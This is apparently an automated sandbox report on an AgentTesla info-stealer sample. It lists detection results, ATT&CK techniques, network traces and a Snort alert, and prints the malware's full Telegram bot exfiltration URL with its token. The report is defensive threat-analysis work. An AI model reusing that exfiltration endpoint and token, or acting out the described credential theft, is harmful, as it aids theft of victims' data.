            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		Path Interception311
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Web Service            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		1
            Credentials in Registry            		1
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration1
            Ingress Tool Transfer            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Account Discovery            		SSHKeyloggingData Transfer Size Limits14
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
            System Owner/User Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow114
            System Information Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            g0PWOnCNZH.exe43%VirustotalBrowse
            g0PWOnCNZH.exe26%ReversingLabsWin32.Trojan.Generic
            g0PWOnCNZH.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.RegSvcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.sajatypeworks.comiv0%URL Reputationsafe
            http://www.sajatypeworks.com20%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.fontbureau.coml10%URL Reputationsafe
            http://www.founder.com.cn/cnD0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            https://api.telegram.org40%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comgrito0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sajatypeworks.comTF0%URL Reputationsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.tiro.com(0%Avira URL Cloudsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.monotype.U0%Avira URL Cloudsafe
            http://www.tiro.comw0%Avira URL Cloudsafe
            http://www.sajatypeworks.comq0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmR0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmR0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            		64.185.227.155
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                api.ipify.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high
                    https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.fontbureau.com/designersGg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.monotype.Ug0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sajatypeworks.comivg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.com2g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/?g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgRegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers?g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersBg0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comg0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.coml1g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnDg0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.orgRegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://fontfabrik.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.org4RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.comgritog0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fonts.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.com(g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.zhongyicts.com.cng0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmRg0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sakkal.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comwg0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comqg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comTFg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comTCg0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.carterandcone.comlg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cng0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.monotype.g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comog0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.telegram.orgRegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse
                                                      64.185.227.155
                                                      		api4.ipify.orgUnited States
                                                      		18450WEBNXUSfalse

                                                      General Information

                                                      Joe Sandbox Version:37.0.0 Beryl
                                                      Analysis ID:830729
                                                      Start date and time:2023-03-20 16:40:05 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:g0PWOnCNZH.exe
                                                      Original Sample Name:87be1ac6122ed0c75b3af80696b9e686.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      16:41:07API Interceptor1x Sleep call for process: g0PWOnCNZH.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g0PWOnCNZH.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                      Static File Info

                                                      General

                                                      File type:
                                                      Entropy (8bit):7.86252276593653
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:g0PWOnCNZH.exe
                                                      File size:746496
                                                      MD5:87be1ac6122ed0c75b3af80696b9e686
                                                      SHA1:28954d7b81380a52dc012eb21c4769fe54070a5c
                                                      SHA256:de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
                                                      SHA512:a58b7039d2967f214534f0609e9e2fa16b0ae2520265bac212cfd8a2d3a908276b1ef54bd8536028ddd1614eafd686d9effdd7d7a3472845c668c1cb1bc7f947
                                                      SSDEEP:12288:r9umYMUnFW/Nhb/kpGsc1WgkAhK6KttQM2AW+DYXoRf0D9u1pHG8RTiy4uhyNv6n:r9uUT2wogkAg6K7Q4pMXomwRhhyNv6
                                                      TLSH:76F402782F8A9538F1321BBD85E8264467AEB3B26713D55D18F511CE4B63B034ED0A2F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..d..............0..N..........fm... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:209480e66eb84902

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.3149.154.167.220496854432851779 03/20/23-16:41:25.765012TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49685443192.168.2.3149.154.167.220

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 20, 2023 16:41:11.823951960 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:11.824016094 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:11.824614048 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:11.861870050 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:11.861911058 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.289160013 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.289249897 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:13.293323994 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:13.293349981 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.293910980 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.336273909 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:13.603498936 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:13.603526115 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.702334881 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.703789949 CET4434968464.185.227.155192.168.2.3
                                                      Mar 20, 2023 16:41:13.703888893 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:13.705327988 CET49684443192.168.2.364.185.227.155
                                                      Mar 20, 2023 16:41:25.648309946 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.648375988 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.648475885 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.649236917 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.649266005 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.715833902 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.715944052 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.718837976 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.718869925 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.719206095 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.721429110 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.721477032 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.762315035 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.764890909 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.764924049 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.857546091 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.857656956 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.858115911 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.858155012 CET49685443192.168.2.3149.154.167.220
                                                      Mar 20, 2023 16:41:25.858175039 CET44349685149.154.167.220192.168.2.3
                                                      Mar 20, 2023 16:41:25.858217001 CET49685443192.168.2.3149.154.167.220

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 20, 2023 16:41:11.759686947 CET5897453192.168.2.38.8.8.8
                                                      Mar 20, 2023 16:41:11.779360056 CET53589748.8.8.8192.168.2.3
                                                      Mar 20, 2023 16:41:11.789952040 CET6372253192.168.2.38.8.8.8
                                                      Mar 20, 2023 16:41:11.807668924 CET53637228.8.8.8192.168.2.3
                                                      Mar 20, 2023 16:41:25.629864931 CET6552253192.168.2.38.8.8.8
                                                      Mar 20, 2023 16:41:25.647144079 CET53655228.8.8.8192.168.2.3

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Mar 20, 2023 16:41:11.759686947 CET192.168.2.38.8.8.80x745eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.789952040 CET192.168.2.38.8.8.80xb647Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:25.629864931 CET192.168.2.38.8.8.80x9cefStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.779360056 CET8.8.8.8192.168.2.30x745eNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:11.807668924 CET8.8.8.8192.168.2.30xb647No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                      Mar 20, 2023 16:41:25.647144079 CET8.8.8.8192.168.2.30x9cefNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.ipify.org
                                                      • api.telegram.org

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:16:41:00
                                                      Start date:20/03/2023
                                                      Path:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\g0PWOnCNZH.exe
                                                      Imagebase:0x990000
                                                      File size:746496 bytes
                                                      MD5 hash:87BE1AC6122ED0C75B3AF80696B9E686
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      General

                                                      Target ID:1
                                                      Start time:16:41:09
                                                      Start date:20/03/2023
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Imagebase:0x570000
                                                      File size:45152 bytes
                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
